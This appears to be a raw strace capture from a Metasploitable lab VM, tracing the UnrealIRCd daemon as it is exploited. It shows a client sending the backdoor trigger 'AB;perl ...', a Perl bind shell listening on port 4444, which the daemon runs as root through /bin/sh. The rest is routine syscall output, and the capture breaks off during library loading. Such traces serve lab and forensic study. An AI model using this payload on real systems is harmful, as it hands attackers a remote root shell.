4519  07:43:12.706131 select(1024, [2 3 4 7 9], [], NULL, {0, 860000}) = 1 (in [2], left {0, 690000})

4519  07:43:12.877680 clock_gettime(CLOCK_MONOTONIC, {3002, 694701687}) = 0

4519  07:43:12.877701 time(NULL)        = 1495626192

4519  07:43:12.877711 time(NULL)        = 1495626192

4519  07:43:12.877723 gettimeofday({1495626192, 877727}, NULL) = 0

4519  07:43:12.877735 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:43:12.877773 clock_gettime(CLOCK_MONOTONIC, {3002, 694785784}) = 0

4519  07:43:12.877783 gettimeofday({1495626192, 877787}, NULL) = 0

4519  07:43:12.877793 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:43:12.877831 clock_gettime(CLOCK_MONOTONIC, {3002, 694843807}) = 0

4519  07:43:12.877843 accept(2, 0, NULL) = 5

4519  07:43:12.877915 getpeername(5, {sa_family=AF_INET, sin_port=htons(42813), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:12.877978 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:12.877990 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:12.878002 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:12.878014 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:12.878025 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:12.878036 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:12.878050 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:12.878066 clock_gettime(CLOCK_MONOTONIC, {3002, 695098304}) = 0

4519  07:43:12.878097 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:12.878204 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:12.878213 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:12.878223 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:12.878233 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:12.878249 send(6, "J\231\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:12.878370 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:12.878408 gettimeofday({1495626192, 878412}, NULL) = 0

4519  07:43:12.878420 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:43:12.881324 clock_gettime(CLOCK_MONOTONIC, {3002, 698339764}) = 0

4519  07:43:12.881348 recvfrom(6, "J\231\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\31\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:12.881436 close(6)          = 0

4519  07:43:12.881450 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:12.881464 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:43:12.881517 time(NULL)        = 1495626192

4519  07:43:12.881529 time(NULL)        = 1495626192

4519  07:43:12.881555 gettimeofday({1495626192, 881559}, NULL) = 0

4519  07:43:12.881566 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:12.881609 clock_gettime(CLOCK_MONOTONIC, {3002, 698621743}) = 0

4519  07:43:12.881619 gettimeofday({1495626192, 881623}, NULL) = 0

4519  07:43:12.881648 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 910000})

4519  07:43:12.963370 clock_gettime(CLOCK_MONOTONIC, {3002, 780390903}) = 0

4519  07:43:12.963392 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:43:12.963417 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963437 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963452 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963467 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963489 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963503 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963516 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963530 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963543 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963557 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963570 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963583 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963597 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963610 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963623 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963637 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963650 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963665 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963678 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963692 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963707 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963721 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:43:12.963748 gettimeofday({1495626192, 963753}, NULL) = 0

4519  07:43:12.963761 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:12.963825 clock_gettime(CLOCK_MONOTONIC, {3002, 780838869}) = 0

4519  07:43:12.963838 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:12.963905 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:12.963924 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:12.963936 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:12.963951 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12597

12597 07:43:12.964021 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12597 07:43:12.964035 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12597 07:43:12.964045 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12597 07:43:12.964076 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12597 07:43:12.964365 brk(0)            = 0x80f9000

12597 07:43:12.964388 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.964404 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd1000

12597 07:43:12.964420 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.964437 open("/etc/ld.so.cache", O_RDONLY) = 1

12597 07:43:12.964449 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12597 07:43:12.964468 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc9000

12597 07:43:12.964479 close(1)          = 0

12597 07:43:12.964490 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.964505 open("/lib/libncurses.so.5", O_RDONLY) = 1

12597 07:43:12.964517 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12597 07:43:12.964614 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12597 07:43:12.964632 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f99000

12597 07:43:12.964644 mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fc6000

12597 07:43:12.964660 close(1)          = 0

12597 07:43:12.964672 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.964685 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12597 07:43:12.964699 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12597 07:43:12.964852 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12597 07:43:12.964869 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f95000

12597 07:43:12.964880 mmap2(0xb7f97000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f97000

12597 07:43:12.964896 close(1)          = 0

12597 07:43:12.964907 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.964920 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12597 07:43:12.964934 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12597 07:43:12.965023 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12597 07:43:12.965040 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f94000

12597 07:43:12.965053 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e45000

12597 07:43:12.965064 mmap2(0xb7f8e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f8e000

12597 07:43:12.965078 mmap2(0xb7f91000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

12597 07:43:12.965092 close(1)          = 0

12597 07:43:12.965113 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e44000

12597 07:43:12.965124 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e446b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12597 07:43:12.965179 mprotect(0xb7f8e000, 4096, PROT_READ) = 0

12597 07:43:12.965215 munmap(0xb7fc9000, 29913) = 0

12597 07:43:12.965269 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.965301 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12597 07:43:12.965335 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff85140) = -1 ENOTTY (Inappropriate ioctl for device)

12597 07:43:12.965365 brk(0)            = 0x80f9000

12597 07:43:12.965374 brk(0x80fa000)    = 0x80fa000

12597 07:43:12.965385 brk(0x80fb000)    = 0x80fb000

12597 07:43:12.965401 getuid32()        = 0

12597 07:43:12.965410 getgid32()        = 0

12597 07:43:12.965419 geteuid32()       = 0

12597 07:43:12.965428 getegid32()       = 0

12597 07:43:12.965441 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.965454 time(NULL)        = 1495626192

12597 07:43:12.965466 brk(0x80fc000)    = 0x80fc000

12597 07:43:12.965480 brk(0x80fd000)    = 0x80fd000

12597 07:43:12.965499 open("/proc/meminfo", O_RDONLY) = 1

12597 07:43:12.965520 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12597 07:43:12.965538 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd0000

12597 07:43:12.965549 read(1, "MemTotal:      1035240 kB\nMemFree:        311348 kB\nBuffers:         89184 kB\nCached:         473432 kB\nSwapCached:          0 kB\nActive:         258108 kB\nInactive:       433428 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        311108 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5148 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            21172 kB\nSReclaimable:    12308 kB\nSUnreclaim:       8864 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12597 07:43:12.965631 close(1)          = 0

12597 07:43:12.965642 munmap(0xb7fd0000, 4096) = 0

12597 07:43:12.965653 brk(0x80fe000)    = 0x80fe000

12597 07:43:12.965679 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12597 07:43:12.965692 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12597 07:43:12.965703 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12597 07:43:12.965715 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12597 07:43:12.965726 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12597 07:43:12.965767 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12597 07:43:12.965781 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12597 07:43:12.965807 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12597 07:43:12.965823 uname({sys="Linux", node="metasploitable", ...}) = 0

12597 07:43:12.965870 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12597 07:43:12.965888 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12597 07:43:12.965906 brk(0x8100000)    = 0x8100000

12597 07:43:12.965917 getcwd("/etc/unreal", 4096) = 12

12597 07:43:12.965931 getpid()          = 12597

12597 07:43:12.965947 getppid()         = 4519

12597 07:43:12.965962 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12597 07:43:12.965982 stat64("/sbin/sh", 0xbff85118) = -1 ENOENT (No such file or directory)

12597 07:43:12.965994 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12597 07:43:12.966011 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12597 07:43:12.966034 socket(PF_FILE, SOCK_STREAM, 0) = 1

12597 07:43:12.966048 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12597 07:43:12.966059 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12597 07:43:12.966081 close(1)          = 0

12597 07:43:12.966092 socket(PF_FILE, SOCK_STREAM, 0) = 1

12597 07:43:12.966102 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12597 07:43:12.966112 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12597 07:43:12.966130 close(1)          = 0

12597 07:43:12.966142 open("/etc/nsswitch.conf", O_RDONLY) = 1

12597 07:43:12.966156 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12597 07:43:12.966172 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd0000

12597 07:43:12.966183 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12597 07:43:12.966279 read(1, "", 4096) = 0

12597 07:43:12.966307 close(1)          = 0

12597 07:43:12.966333 munmap(0xb7fd0000, 4096) = 0

12597 07:43:12.966349 open("/etc/ld.so.cache", O_RDONLY) = 1

12597 07:43:12.966362 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12597 07:43:12.966378 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc9000

12597 07:43:12.966402 close(1)          = 0

12597 07:43:12.966412 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.966426 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12597 07:43:12.966454 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12597 07:43:12.966544 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12597 07:43:12.966561 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e3b000

12597 07:43:12.966573 mmap2(0xb7e42000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e42000

12597 07:43:12.966593 close(1)          = 0

12597 07:43:12.966604 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12597 07:43:12.966617 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12597 07:43:12.966631 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

